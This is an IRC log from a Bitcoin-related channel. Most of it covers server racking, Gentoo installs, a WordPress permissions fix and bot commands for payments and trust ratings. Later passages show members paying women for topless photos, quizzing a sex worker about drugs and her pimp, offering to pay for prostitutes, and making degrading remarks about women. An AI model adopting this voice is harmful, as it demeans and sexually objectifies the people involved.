1800428;1523910238;deedbot;Get your OTP: http://p.bvulpes.com/pastes/QA6sv/?raw=true 1800429;1523910241;danielpbarron;right now i'm trying to figure out why the pretty urls thing broke my edit-post thing to where the handy "insert link/blockquote" buttons disappeared 1800430;1523910264;mircea_popescu;danielpbarron, sounds like permission issue on the js dir. check all your htaccesses. 1800431;1523910283;mircea_popescu;but the why not was re " he's not interested in doing the whole irc thing". 1800432;1523910295;mircea_popescu;!!up ascii_lander 1800433;1523910295;deedbot;ascii_lander voiced for 30 minutes. 1800434;1523910314;mircea_popescu;tell me i got my minigame box now ? 1800435;1523910369;ascii_lander;mircea_popescu: it's racked. still need engentooation 1800436;1523910381;mircea_popescu;yay. 1800437;1523910388;mircea_popescu;well let me know. and re douchebag 's item also! 1800438;1523910390;mircea_popescu;eeexciting times. 1800439;1523910393;ascii_lander;mircea_popescu: you can have dulap's gentoo, or make own when the ipkvm comes online tonight 1800440;1523910398;douchebag;lmao...yep 1800441;1523910399;ascii_lander;( it needs a dr mengele job re the power cord ) 1800442;1523910427;danielpbarron;aha, i see the problem. js/.htaccess had "deny from all" 1800443;1523910429;ascii_lander;of greater concern is trinque's machine; i am starting to think that one of his sub-blades has overheat issue 1800444;1523910441;ascii_lander;trinque: around ? 1800445;1523910477;danielpbarron;is it not a good idea to allow all on this directory? is it not protected in the same way the rest of wp-admin is? via username/password SESSION or w/e? 1800446;1523910497;*;ascii_lander is on a pingpong table in BingoBoingo's coworkery, freeloading on a sp pronounciation lesson by very puurty venezolana chixx 1800447;1523910515;mircea_popescu;danielpbarron, it's not world-readable in principle, but you can just lock it to yourself only without drawbacks also. 1800448;1523910536;danielpbarron;mircea_popescu, oh the why not irc, i'd have to ask for more specifics but generally he's pretty busy as it is, and he doesn't like to hang out with non believers too much 1800449;1523910546;mircea_popescu;ascii_lander, pic the lovebirds, i'm curious if any of the weight rubbed back off on him! 1800450;1523910576;Brittt;https://i.imgur.com/BnkjBfp.jpg 1800451;1523910582;mircea_popescu;danielpbarron, so are you going to become the al soto v2.0 ? historically the guy did a lot trying to get the thing online, with mixed success. 1800452;1523910596;danielpbarron;i hope not 1800453;1523910614;mircea_popescu;are you moving there permanently btw ? 1800454;1523910621;danielpbarron;already did 1800455;1523910623;ascii_lander;mircea_popescu: took pic. will upload when i get back to room where the photo-extraction cable is 1800456;1523910648;mircea_popescu;!!pay Brittt 0.02 1800457;1523910652;deedbot;Get your OTP: http://p.bvulpes.com/pastes/CJMW7/?raw=true 1800458;1523910705;mircea_popescu;ascii_lander, cool deal. 1800459;1523910707;ascii_lander;bahahaha i could listen to this chix allday 1800460;1523910778;*;ascii_lander attemps to eat log before battery dies 1800461;1523910839;ascii_lander;mircea_popescu: lemme know if you will be making own gentoo (or whichever alternative) for smg box, or whether you'd like an engentooation with my own hands 1800462;1523910850;mircea_popescu;diana_coman, ? 1800463;1523910913;ascii_lander;( 100% of cargo racked btw. tho some of the rails had to be bent, i bent'em back by hand lol ) 1800464;1523910952;mircea_popescu;nice. 1800465;1523910985;mircea_popescu;it occurs to me : next trip could actually be bingoboingo himself ? 1800466;1523911009;diana_coman;engentootation by ascii_lander's own hands sounds good to me 1800467;1523911035;mircea_popescu;cool. ascii_lander you using trinque 's recipe or own device ? 1800468;1523911080;ascii_lander;mircea_popescu: own, which is much moar 'plane jane', isn't musltronic yet sadly 1800469;1523911094;ascii_lander;but if trinque wants to do his, i can put him on kvm 1800470;1523911111;danielpbarron;huzzah! got my buttons back! tyvm 1800471;1523911112;ascii_lander;the q is, will your item run on musltronic gentoo ( is it static ? ) 1800472;1523911115;mircea_popescu;just trying to merge these eventually. 1800473;1523911124;mircea_popescu;ascii_lander, i don't expect it is no. 1800474;1523911147;mircea_popescu;but he got fucking deluge and other arbitrary "here's some web-picked shit" going on his, so i am currently very highly regarding it. 1800475;1523911177;ascii_lander;then prolly you'll be wanting mean old drepperistic gentoo then. 1800476;1523911177;ascii_lander;mircea_popescu: i am to understand that he has a 100% working musltron 1800477;1523911195;ascii_lander;but on those you gotta be yourself statically linked (rather than trying to load glibc) 1800478;1523911203;mircea_popescu;i am unclear on the details yet. 1800479;1523911227;mircea_popescu;diana_coman, ascii_lander anyway, i expect you'll keep each other entertained for a spell with mg server, so. 1800480;1523911276;ascii_lander;i had a musltronic selfmade buildrootlinuxoid on pogo, it had this attribute (unsurprisingly) 1800481;1523911321;diana_coman;sadly not static, no 1800482;1523911352;ascii_lander;ascii_lander's current objectives : 1) find out wtf is happening to trinque's blade 2) drmengele power distributor to fit #14 cable 3) power up the ipkvm (ru plug) and 5v power source for rockchippen (ditto) 1800483;1523911423;ascii_lander;after (3) engentooation can be carried out from a place where i dun have to sit on the floor and have back of shirt menacingly sucked into the exhaust manifold 1800484;1523911435;ascii_lander;'peligro! rotando' 1800485;1523911454;mircea_popescu;diana_coman, listen, better if you put the gentoo in, unload his schedule some. 1800486;1523911485;ascii_lander;i'ma get a boot stick in there also 1800487;1523911520;ascii_lander;mircea_popescu: i played 100% of my cards correctly, thus far, prolly will have 2 ~empty days even 1800488;1523911546;mircea_popescu;next you know, he's sucked through manifold, spends them in hospital. 1800489;1523911560;ascii_lander;bahaha 1800490;1523911574;diana_coman;ascii_lander, did you publish anywhere the recipe you intend to follow for this? 1800491;1523911583;ascii_lander;inside dc proper, i fear nuffin, i spent moar time than i care to admit, in'em 1800492;1523911618;ascii_lander;diana_coman: i published the 'seekrit ingredient' (the use flags for banning crapola) and then danielpbarron turned it into a proper recipe 1800493;1523911629;ascii_lander;danielpbarron wouldja happen to have the link handy ? 1800494;1523911647;*;ascii_lander is on a battle-weary x60, dun have the bookmarksen 1800495;1523911675;mircea_popescu;in any case we have to reconcile and converge these two trunks. 1800496;1523911698;mircea_popescu;trinque, link me again to your recipe, what was it ? 1800497;1523911719;ascii_lander;mircea_popescu: trinque has the superior item, it oughta supercede the trad gentoo 1800498;1523911902;*;ascii_lander somewhat distracted, first class chixx 1800499;1523911911;danielpbarron;ascii_lander, my recipe (on old blog) http://meadow.danielpbarron.com/2017/gentoo-eulora-quest/ ; but really trinque's is better 1800500;1523911926;ascii_lander;danke schon, danielpbarron 1800501;1523911951;ascii_lander;danielpbarron: trinque's is musltronic, which is Teh Fyootoor but gotta make sure that mircea_popescu's proggy runs on this. 1800502;1523912001;danielpbarron;also my recipe almost certainly doesn't work anymore, but it's a good starting point 1800503;1523912033;ascii_lander;oh incidentally !! 1800504;1523912048;*;ascii_lander discovered that the rack in fact contains a remotely-operable power distributor 1800505;1523912062;ascii_lander;seems like we can live like white men indeed 1800506;1523912075;ascii_lander;(i.e. remotely cycle boxen) 1800507;1523912083;ben_vulpes; whoa nifty 1800508;1523912101;ascii_lander;one fewer item i gotta put in the next crate 1800509;1523912103;ascii_lander;( it was on the list ) 1800510;1523912132;mod6;niiiice! 1800511;1523912143;douchebag;!!up KellieCx 1800512;1523912143;deedbot;KellieCx voiced for 30 minutes. 1800513;1523912148;KellieCx;!!register http://p.bvulpes.com/pastes/3wuX0/?raw=true 1800514;1523912151;deedbot;B0181F095A36FE3FCA512AE9ABE341A534817776 registered as KellieCx. 1800515;1523912164;diana_coman;I have ascii_lander's cribsheet at least but after the previous experience with trinque's stuff I'm almost sure there'll be some fresh trouble 1800516;1523912193;trinque;you can still use the script as literature, but no, my cuntoo installer is not done. 1800517;1523912249;diana_coman;trinque, and it's very useful as literature for sure 1800518;1523912265;KellieCx;tits 1800519;1523912269;ascii_lander;diana_coman: if you like i can even produce a straight copy of dulap's gentoo, which you can later customize. 1800520;1523912269;trinque;ascii_lander: can I direct your attention to #pizarro, or BingoBoingo's? 1800521;1523912289;diana_coman;to recap: I have ascii_lander's cribsheet; danielpbarron's old recipe; trinque's script 1800522;1523912307;ascii_lander;trinque: BingoBoingo is occupied 1800523;1523912317;diana_coman;ascii_lander, sounds tempting but... what is dulap's gentoo? 1800524;1523912360;ascii_lander;diana_coman: conventional (drepperistic) 1800525;1523912557;douchebag;!!up Melissalmao 1800526;1523912558;deedbot;Melissalmao voiced for 30 minutes. 1800527;1523912609;Melissalmao;!!register http://p.bvulpes.com/pastes/18B9X/?raw=true 1800528;1523912612;deedbot;28C5818B5E149FCDA63E1731CAA99B9A7CBAF619 registered as Melissalmao. 1800529;1523912670;diana_coman;it's a pity there isn't really time now to experiment with this machine as the server has been down for long enough already, ugh; 1800530;1523912705;ascii_lander;diana_coman: hence why i suggest to have what i'm eating. 1800531;1523912720;ascii_lander;( luckily you have exactly same type of box. ) 1800532;1523912725;trinque;diana_coman: did you want a gentoo build? 1800533;1523912737;*;trinque did one for mircea_popescu, wouldn't be opposed to doing one for you. 1800534;1523912745;diana_coman;ascii_lander, ah, I see; I was puzzling re box type, searching for dulap's description to compare 1800535;1523912751;ascii_lander;lemme know what you need for this, trinque 1800536;1523912751;ascii_lander;other than kvm 1800537;1523912775;ascii_lander;diana_coman: you an' i have exactly same box, with the exception where you have 2 ps, and moar disk 1800538;1523912795;diana_coman;trinque, ascii_lander offered to do it; if it's not done by pizarro there's at least more useful experience for me to do it anyway 1800539;1523912805;ascii_lander;( incidentally lemme know how you want the disks arrayed; if this were mine, i'd put them in raid5 , using 4tb to yield 3tb of storage, plus using 5th 1tb as hotspare. ) 1800540;1523912833;trinque;ah k 1800541;1523912843;ascii_lander;i have no objection to doing it; but i also have no objection if somebody else wants to. 1800542;1523912846;*;trinque will back away, splitting attention, will bbl 1800543;1523913131;mircea_popescu;Melissalmao, c3354a50. half hour --- starting nao. 1800544;1523913142;mircea_popescu;KellieCx, 80d4b66c same deal. 1800545;1523913309;mircea_popescu;aite, seems like the dulap clone is the correct approach here. we'll maybe look at moar cuntoo stuff later. 1800546;1523913316;mircea_popescu;ascii_lander, plox to clone it in at your leisure. 1800547;1523913321;diana_coman;ascii_lander, raid5 as described sounds good; go ahead then and put the same as on dulap 1800548;1523913337;ascii_lander;ok will do exactly this 1800549;1523913378;ascii_lander;you can always rebuild/tweak later 1800550;1523913402;ascii_lander;and potentially once moar disks are brought over, can use your 'spare' box as a staging box 1800551;1523913432;ascii_lander;( ascii_lander's cargo included 1) dulapIII 2) dulapIII-spare 3) smg 4) smg-spare 1800552;1523913432;ascii_lander;) 1800553;1523913981;diana_coman;ok; if there's anything else - I'll be around for about half hour more now and then tomorrow (in ~9 hours from now) 1800554;1523914051;ascii_lander;let's pessimistically shoot for smg box to be inbiznis by end of tomorrow 1800555;1523914112;*;ascii_lander discovered that some things take a while in orcistan: hour march to get to cable shop, plodding behind flocks of zombies, then hr back.. 1800556;1523914179;*;ascii_lander bbl 1800557;1523914503;douchebag;!!up KellieCx 1800558;1523914504;deedbot;KellieCx voiced for 30 minutes. 1800559;1523914505;douchebag;haha... 1800560;1523914509;KellieCx;https://i.imgur.com/wySP5ek.jpg 1800561;1523914531;KellieCx;https://i.imgur.com/IezNqGg.jpg 1800562;1523914536;douchebag;!!up Melissalmao 1800563;1523914537;deedbot;Melissalmao voiced for 30 minutes. 1800564;1523914559;Melissalmao;https://i.imgur.com/n3lnB44.png 1800565;1523914624;Melissalmao;https://i.imgur.com/f2cysW5.jpg 1800566;1523914660;mircea_popescu;KellieCx, way too low light. look at http://trilema.com/2014/ill-pay-for-your-tits/http://trilema.com/2014/ill-pay-for-your-tits/ and redo. 1800567;1523914665;mircea_popescu;!!pay Melissalmao 0.02 1800568;1523914670;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Unc2W/?raw=true 1800569;1523914671;mircea_popescu;let's try and get the first one right shall we! 1800570;1523914693;mircea_popescu;eh, nevermind that. 1800571;1523914707;mircea_popescu;Melissalmao your first one was way too blurry, you missed half the face in the 2nd. 1800572;1523914719;mircea_popescu;do it properly! 1800573;1523915655;KellieCx;https://i.imgur.com/RvXDS3n.png 1800574;1523915733;mircea_popescu;not any better. 1800575;1523916879;douchebag;some people are just losers 1800576;1523916993;douchebag;!!up Melissalmao 1800577;1523916994;deedbot;Melissalmao voiced for 30 minutes. 1800578;1523917003;Melissalmao;https://i.imgur.com/01lPTG9.jpg 1800579;1523917074;douchebag;Much better. 1800580;1523917120;ben_vulpes;is it though? 1800581;1523917136;*;ben_vulpes ducks back out 1800582;1523917137;douchebag;Well it's not blurry and I can see her face 1800583;1523917487;mircea_popescu;win 1800584;1523917522;mircea_popescu;a blurry gaze for the books, huh. 1800585;1523917525;mircea_popescu;how goes Melissalmao ? 1800586;1523917590;Melissalmao;good! 1800587;1523917606;mircea_popescu;are you high on anything ? 1800588;1523917687;Melissalmao;A little, yourself? 1800589;1523917696;mircea_popescu;not really. 1800590;1523917737;mircea_popescu;well, myself, but i'm getting inured. 1800591;1523917756;Melissalmao;what does inured mean? 1800592;1523917784;mircea_popescu;used to it, like tolerance. 1800593;1523917841;Melissalmao;I know that all too well myself 1800594;1523917868;mircea_popescu;so what's your favourite trip ? 1800595;1523917888;Melissalmao;Ex 1800596;1523917899;mircea_popescu;what's ex ? 1800597;1523917902;mircea_popescu;ecstasy ? 1800598;1523917908;Melissalmao;yes 1800599;1523917937;mircea_popescu;do you rave too ? 1800600;1523917968;Melissalmao;no not really i have before but i wouldnt call myself a raver 1800601;1523918043;mircea_popescu;so what do you do with yourself ? 1800602;1523918070;Melissalmao;im a sex worker 1800603;1523918113;mircea_popescu;but besides that ? or is it one of those things, like being religious, takes up the whole day. 1800604;1523918158;Melissalmao;it goes on until the phone stops ringing its a hell of a lifestyle 1800605;1523918178;*;mircea_popescu was always impressed by how similar really devout religious people, doing the whole purity thing, and really dedicated whores, doing the whole thing, drugs etc actually are. 1800606;1523918198;mircea_popescu;Melissalmao, got a pimp and everything ? 1800607;1523918208;Melissalmao;yes 1800608;1523918216;mircea_popescu;how much does he get ? 1800609;1523918254;mircea_popescu;!!rate Melissalmao 1 working girl. 1800610;1523918256;deedbot;Get your OTP: http://p.bvulpes.com/pastes/rQVZ4/?raw=true 1800611;1523918267;deedbot;http://danielpbarron.com/2018/a-conversation-between-darwin-fish-and-mircea-popescu/ << Daniel P. Barron - A conversation between Darwin Fish and Mircea Popescu 1800612;1523918303;mircea_popescu;danielpbarron, it's aluded. to elude is to avoid. 1800613;1523918322;Melissalmao;well no amount in particular we pay for eachothers shit though 1800614;1523918375;mircea_popescu;so basically it's like an arthouse/halfwayhouse w/e, there's a bunch of you girls living together and trying to make ends meet ? 1800615;1523918389;Melissalmao;something like that 1800616;1523918458;douchebag;mircea_popescu: I think it's worth mentioning that both Melissalmao and Brittt are recieving the same issue with deedbot as earlier 1800617;1523918474;mircea_popescu;Melissalmao, so it's not really a pimp, more like the house mother ? 1800618;1523918498;mircea_popescu;douchebag, somewhat suspicious, as it told me " mircea_popescu paid Melissalmao 0.02". is their key no good or something ? 1800619;1523918507;Melissalmao;!!balance 1800620;1523918511;deedbot;http://p.bvulpes.com/ 1800621;1523918545;mircea_popescu;aite, we'll see what trinque says about this when he has a moment. in the meanwhile Melissalmao Brittt dun fret, your cents are safe. 1800622;1523918572;Melissalmao;she calls herself a pimp but shes not like most pimps 1800623;1523918585;mircea_popescu;is it thatbitchlola or different girl altogether ? 1800624;1523918639;douchebag;it is 1800625;1523918651;mircea_popescu;aha. 1800626;1523918662;mircea_popescu;danielpbarron, http://danielpbarron.com/2018/a-conversation-between-darwin-fish-and-mircea-popescu/#identifier_4_28 < technically it was CCs, ie, plural of credit card. 1800627;1523918801;mircea_popescu;!!up Melissalmao 1800628;1523918802;deedbot;Melissalmao voiced for 30 minutes. 1800629;1523918815;mircea_popescu;Melissalmao, if you want to hang around, you can voice yourself (say !!up to deedbot in pm). 1800630;1523918853;Melissalmao;okay hehe 1800631;1523918979;danielpbarron;fxd ty 1800632;1523919003;mircea_popescu;incidentally, if any lord wants to sample lola's wares, i'll pay for your chicago hooker. 1800633;1523919014;mircea_popescu;danielpbarron, so is it your inference the wireguard fellow got bothered by the wrongness of it all / jealous / whatever ? 1800634;1523919075;danielpbarron;possibly, or the devil caused him to in order to disrupt it 1800635;1523919095;mircea_popescu;seemed to me the interplay was actually productive. 1800636;1523919108;mircea_popescu;ie, each convo was better jointly than it'd have been on its own. 1800637;1523919180;danielpbarron;maybe it was, but the purpose of my post is to highlight just you and darwin 1800638;1523919203;mircea_popescu;i dun see a problem. 1800639;1523919333;ckang;hello all 1800640;1523919340;douchebag;h ckang 1800641;1523919349;mircea_popescu;hey ckang. got more frukr beauties queued up ? 1800642;1523919361;ckang;oh just reading, wireguard guy got upset? 1800643;1523919390;mircea_popescu;nfi. 1800644;1523919631;ckang;ill ping him in a few and see if everything is okay 1800645;1523919641;mircea_popescu;nah, don't pester the guy. 1800646;1523920773;trinque;seems like for some reason some of these aren't making it through the registration process 1800647;1523920774;trinque;sec 1800648;1523920915;trinque;!!up Melissalmao 1800649;1523920916;deedbot;Melissalmao voiced for 30 minutes. 1800650;1523920922;trinque;balance will show now. 1800651;1523921334;Melissalmao;okay <3 1800652;1523921594;ben_vulpes;https://gizmodo.com/meet-the-woman-who-leads-nightwatch-google-s-internal-1825227132 << haw haw, google 'cmu alum' attempts to get homomorphic encryption into production, discovers upon review by people who actually write instead of wank^H^Hx theoretic that it'd take more horsepower than google has worldwide 1800653;1523921607;ben_vulpes;scuse me 'cmu *cryptography* alum' 1800654;1523921637;ben_vulpes;probably same programs that harp on quantum decryption and steadfastly ignore their own failures to produce constanttime encryptulators. 1800655;1523922079;douchebag;trinque: don't forget about Brittt too 1800656;1523922090;douchebag;don't mean to bother you, just reminding 1800657;1523922099;trinque;nah ty, will do that one too 1800658;1523923170;lobbes;phew, killer logs today 1800659;1523923212;*;lobbes esp. loved the parallel running convos of mp/wiresharkguy with mp/atruechurchguy 1800660;1523924702;*;mircea_popescu is unswampable. 1800661;1523924774;ascii_lander;aaaaaaand reporting live from inside the fuckin' rack!! 1800662;1523924784;ascii_lander;trinque: plz try an' ping yer box ? 1800663;1523924786;ascii_lander;it pings here 1800664;1523924798;ascii_lander;and in fact pung here since we walked in noprob 1800665;1523924807;ascii_lander;aaaaaaand the rockchippen are live 1800666;1523924815;ascii_lander;aaaaaaaand ipkvm is live 1800667;1523924827;mircea_popescu;lol this guy 1800668;1523924918;lobbes;life all around! congrats pizarro folx 1800669;1523924932;mircea_popescu;danielpbarron, your pingbacks made it alright too! 1800670;1523924935;trinque;cannot ping. 1800671;1523924938;ascii_lander;not congrats yet, apparently ^ 1800672;1523924946;ascii_lander;trinque: which ones are you ? 1800673;1523924960;trinque;.250 (dead) and .251 (live) 1800674;1523924973;ascii_lander;both ping here 1800675;1523924974;trinque;.250 has SSDs 1800676;1523924980;ascii_lander;any other ports open on these that i can try ? 1800677;1523924990;ascii_lander;( possibly 250 just dun like icmp ? ) 1800678;1523925006;trinque;nah pinged before. also can't ssh 1800679;1523925028;ascii_lander;it accepts ssh attempt from here 1800680;1523925038;trinque;then not routing from outside world? 1800681;1523925051;ascii_lander;something peculiar !! 1800682;1523925060;ascii_lander;did somebody dupe .250 ?? 1800683;1523925065;ascii_lander;cuz that would do it 1800684;1523925071;ascii_lander;and i do happen to know that it wasn't me 1800685;1523925098;trinque;yeah I speculated that in #pizarro 1800686;1523925109;trinque;I can indeed ping 250 from 251, inside that net 1800687;1523925146;ascii_lander;let's move the proceeding to #p 1800688;1523925151;trinque;aye aye 1800689;1523925614;ascii_lander;we will at some point post photos of, e.g., rooftop at night where we drmengele'd the mains distributor panel bought from orcshop 1800690;1523925706;ascii_lander;diana_coman, mircea_popescu : i'ma bring up yer box nao 1800691;1523926384;ckang;!!up jaxxie 1800692;1523926384;deedbot;jaxxie voiced for 30 minutes. 1800693;1523926412;jaxxie;mircea_popescu: here for picture. 1800694;1523926513;lobbes;!!v B9A2A84E0F515EDC426BFE17C5DC57841A0EEDC8330DB33BCCD3543D17ECC6D7 1800695;1523926847;mircea_popescu;jaxxie, da91029. half hour. 1800696;1523927050;ascii_lander;all 6 rockboxen ready for lease btw. 1800697;1523927068;ascii_lander;mod6, ben_vulpes , & prospective userz ^^^ 1800698;1523927170;ascii_lander;we now adjourn for the evening, rack-wise, gotta eat, sleep 1800699;1523927173;*;ascii_lander bbl. 1800700;1523927190;ascii_lander;smg box i expect is to be brought into service early tomorrow. 1800701;1523927204;ascii_lander;once i can get hold of a bootable-sumthing that knows about the raid. 1800702;1523927308;lobbes;any pricing info out on those rockchip boxen (I, too, may have missed but dun see anything)? >> http://logs.bvulpes.com/pizarro?d=2018-4-8#327990 1800703;1523927308;mimisbrunnr;Logged on 2018-04-08 04:28 PeterL: Oh, I see the question got asked but I don't see an answer in the logs? http://logs.bvulpes.com/pizarro?d=2018-4-8#327411 1800704;1523927308;mimisbrunnr;Logged on 2018-04-07 05:33 Vexual: any idea on cost to rent an rockchip board? 1800705;1523927328;mod6;lobbes: we're workin on that. 1800706;1523927338;lobbes;word. 1800707;1523927450;mod6;there are only six, seems like they're gonna go quickly. 1800708;1523927556;lobbes;I'm probably too poor, but if it is in my range I'll most likely try and grab one for trb-ing 1800709;1523927631;lobbes;my current trb box I'm planning to run at home is a mystery box someone gave me; troubleshooting all the hardware issues I keep uncovering are delaying things. Would be nice to have two eventually anyhow 1800710;1523927703;lobbes;s/are/is 1800711;1523928013;jaxxie;https://usercontent.irccloud-cdn.com/file/olMyrmP8/image.jpg 1800712;1523928035;jaxxie;I can't find a black one 1800713;1523928418;mod6;shinohai: happy belated! 1800714;1523930405;mircea_popescu;jaxxie, get all your face in there ; get all the string in there. 1800715;1523930614;ckang;i told her to get a black marker and face but she had to run off 1800716;1523930621;ckang;!!up roxann3 1800717;1523930622;deedbot;roxann3 voiced for 30 minutes. 1800718;1523930663;trinque;at least she's pretty 1800719;1523930669;roxann3;mircea_popescu: here for same too 1800720;1523930682;mircea_popescu;roxann3, 59266286. same half hour. 1800721;1523930832;mircea_popescu;ckang, or she couldyou know, write under rahter than over tattoo. 1800722;1523930848;*;trinque apparently missed a whole bunch of pretty ones, saw instead trucker whores on parade 1800723;1523930873;mircea_popescu;trinque, theoretically women are more clustered towards the mediocre. in practice however... 1800724;1523930897;trinque;when american goes bad it goes allthewaybad 1800725;1523930898;ckang;yea she got an earful, may have scared her off lol 1800726;1523931165;*;trinque was fucking this chick for a while, real cute, but had same-position chest tattoo 1800727;1523931187;trinque;hers was a ribbon tied up like a present, extremely poorly done 1800728;1523931213;*;trinque would stare at the thing the whole time, eventually lost interest. "that ain't coming off or getting covered" 1800729;1523931272;ckang;least it wasnt a coverup 1800730;1523931278;ckang;those can look way worse 1800731;1523931590;roxann3;https://usercontent.irccloud-cdn.com/file/re7AdXIn/image.jpg 1800732;1523932174;mod6;Here comes the flood. 1800733;1523932177;mod6;!!v 740D55B917DD09C3FED463BBF78CC2380E471667B8167F5FF7C126CB045E3EBA 1800734;1523932177;deedbot;mod6 updated rating of mircea_popescu from 6 to 6 << Met IRL. MPEx, Trilema, S.NSA, S.MG: Father of The Most Serene Republic. 1800735;1523932194;mod6;!!v CF327512C35E25FC0155F9A35E6664E8CE74EE3F37DE0F396C46E1FC2A6AD571 1800736;1523932194;deedbot;mod6 updated rating of ben_vulpes from 5 to 5 << Met IRL. The Lord of the Well, Bitcoin Foundation Co-Chair, Pizarro Manager 1800737;1523932205;mod6;!!v 00A4C202C9DF9C961CCAA3DDFFF7F99DEBDB71650311F398C0B8E303C9A314D6 1800738;1523932206;deedbot;mod6 updated rating of hanbot from 4 to 4 << Met IRL. The Lady Falconeer, Tester of all things TMSR~ 1800739;1523932215;mod6;!!v C851B6EC714F5421E76F0B60B51D0DD7F9F27BBC0DD9F17654F0DE85603A8A71 1800740;1523932215;deedbot;mod6 updated rating of jurov from 4 to 4 << Three years of service as The Bitcoin Foundation Treasurer 1800741;1523932223;mod6;!!v 57E8CA238AB07F914E7796B2AF4A11D8DC8A2E978035261C66A05FE47CDF6B69 1800742;1523932224;deedbot;mod6 updated rating of asciilifeform from 4 to 5 << Met IRL. Lord Admiral. S.NSA, FUCKGOATS, Pizarro: Shiva 1800743;1523932235;mod6;!!v C7E456293CC3EDDE50561A065B9D0FC08A0E5FC92FB008B05B3CADC6157E6937 1800744;1523932235;deedbot;mod6 updated rating of trinque from 3 to 4 << Master of the Rolls, deedbot 1800745;1523932243;mod6;!!v V 1800746;1523932248;mod6;!!v 09EA11B0A4743A7F86F7A79072505DA58081B7B05850CDD2112351966BD67D82 1800747;1523932248;deedbot;mod6 updated rating of danielpbarron from 2 to 3 << The learned Trishop 1800748;1523932258;mod6;!!v 4B97876D551E532CAF4C1220C58C7E41F915AB6F64518C69C196C0EADA820C62 1800749;1523932259;deedbot;mod6 updated rating of diana_coman from 2 to 4 << Marquess Eulora, Eulora CTO 1800750;1523932269;mod6;!!v 6D62BB334504EADC72C5A45B3F79A3C0BC98F7415A4ABC5C796129D3F38B270F 1800751;1523932270;deedbot;mod6 updated rating of BingoBoingo from 1 to 5 << Lord Goebbels, qntra, Pizarro System Administrator 1800752;1523932279;mod6;!!v 737538AF79B0609AD31A82BBFFB6B9BE622ED4B2B10ED83D881A5CC4076FE795 1800753;1523932280;deedbot;mod6 updated rating of phf from 1 to 4 << Lord Chancellor, btcbase.org, logs, vtools 1800754;1523932313;mod6;!!v FB4FDC9D14879B1AB911738FA1144A9C39C54AA41EA69E0157A5C88651DB6168 1800755;1523932313;deedbot;mod6 updated rating of btchero from 4 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800756;1523932313;mod6;!!v 292B8363199732EBA43A83E8DCF1F43ED0549A2C2CD1BDC6021AF45B88C71E86 1800757;1523932313;deedbot;mod6 updated rating of glooboy from 4 to 1 << Original rating dating back 5 years. Have not heard from in long time. 1800758;1523932313;mod6;!!v 2BA3C77FD169226E2E3FB9E6B826067A80A80856E1931A6B7364DE05FA39BA1A 1800759;1523932313;deedbot;mod6 updated rating of cory from 3 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800760;1523932319;mod6;!!v 68C5260ECDFE08D79C714DAFFF03C996EE3128348984E01164C364526627DBF3 1800761;1523932320;deedbot;mod6 updated rating of mike_c from 3 to 1 << Met IRL. Former Lord, off doing other things. 1800762;1523932328;mod6;!!v D6BCC5D9A708947A7046F4D16964C54488D129CF5DD32D6FBED5A070537244BD 1800763;1523932328;deedbot;mod6 updated rating of paulzag from 3 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800764;1523932339;mod6;!!v A35E56105B164A9B1615498C95D1C25617102E10DFE147ED9FA6F40549F38AD3 1800765;1523932340;deedbot;mod6 updated rating of pho from 3 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800766;1523932350;mod6;!!v 1800767;1523932352;mod6;!!v DA3517780EBF8C3758BAEB0D19ADC2A9642D4E1872A87258A2750EE4AA7D7940 1800768;1523932352;deedbot;mod6 updated rating of imsaguy from 2 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800769;1523932362;mod6;!!v 4DDB595B7B65D4F955DA8B63518D34576AB18A59DA75B7A1A8C738CEA97326D7 1800770;1523932362;deedbot;mod6 updated rating of pete_dushenski from 2 to 1 << Runs two TRB nodes. Has bitcoin related blog. 1800771;1523932375;mod6;!!v 4F054F9FD2649032C88D0D6C6CAA566A8214B8B5CD33275240F982CC340206AA 1800772;1523932375;deedbot;mod6 updated rating of sgornick from 2 to 1 << Original rating dating back 6 years. Have not heard from in long time. 1800773;1523932384;mod6;!!v 155231619BB6017871F4D1C1E5BCAC614DD5C1B327A29D9A0C048713D427ED8B 1800774;1523932385;deedbot;mod6 updated rating of davout from 2 to 1 << Met IRL, #trilema 1800775;1523932396;mod6;!!v 4745ECDFB4B0D92A3F969FE1CED2D90EDFB2B5A7CDD5F3807BECD5471FE22690 1800776;1523932396;deedbot;mod6 unrated kakobrekla. 1800777;1523932405;mod6;!!v E3B4EB5538E7BA483D1F39E460067DEDDE3EB8988448B419DF030F49A3576BD3 1800778;1523932405;deedbot;mod6 unrated smickles. 1800779;1523932414;mod6;!!v 19BDFF5C0EB9170467CCAD4FBEA277A8FA160F6F46DB37176C3BA6B8C625796D 1800780;1523932414;deedbot;mod6 unrated thestringpuller. 1800781;1523932422;mod6;!!v E9F75F9E6D61F7E8836F475C54E700B4E15675BCEAB52C2BFD3967ED86629987 1800782;1523932422;deedbot;mod6 unrated funkenstein_. 1800783;1523932431;mod6;!!v C999969A6CEBD2842768CB7A1FE7C108924530092C902D55A33E05B88EF9937A 1800784;1523932431;deedbot;mod6 unrated pinkposixpxe. 1800785;1523932440;mod6;!!v 02D057C088F2632495617A512A2D9A35CF891BE0FD00E8952B56AD7886E59DB6 1800786;1523932440;deedbot;mod6 unrated punkman. 1800787;1523932447;mod6;!!v 8B1EEFAE03346FC70DD3824D4E44F711BC882AD2AD7603F4BFE580667282D49F 1800788;1523932448;deedbot;mod6 unrated apocalyptic. 1800789;1523932455;mod6;!!v 1800790;1523932458;mod6;!!v B77B05BF8823D2B9B985531AD06E9866A11EC625D2F2626D09905A918AD6BD96 1800791;1523932459;deedbot;mod6 unrated artifexd. 1800792;1523932468;mod6;!!v 50F62C5D7CDAB5341AE220A3FA236D5E313D3368D2F496CF2E6FA5E4A90E7354 1800793;1523932468;deedbot;mod6 unrated assbot. 1800794;1523932477;mod6;!!v 90D235373A73F90DAFD7AD5ADD48AA79DA48832A31C400A206E83B8DBF43CCCA 1800795;1523932477;deedbot;mod6 rated lobbes 1 << Lobbesbot, #trilema 1800796;1523932524;mod6; 1800797;1523932571;mircea_popescu;!!pay roxann3 0.02 1800798;1523932576;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xWUMT/?raw=true 1800799;1523932585;mircea_popescu;!!up kendraB 1800800;1523932586;deedbot;kendraB voiced for 30 minutes. 1800801;1523932607;kendraB;thanx 1800802;1523932619;kendraB;here of picture 1800803;1523932622;kendraB;for 1800804;1523932657;mircea_popescu;kendraB, 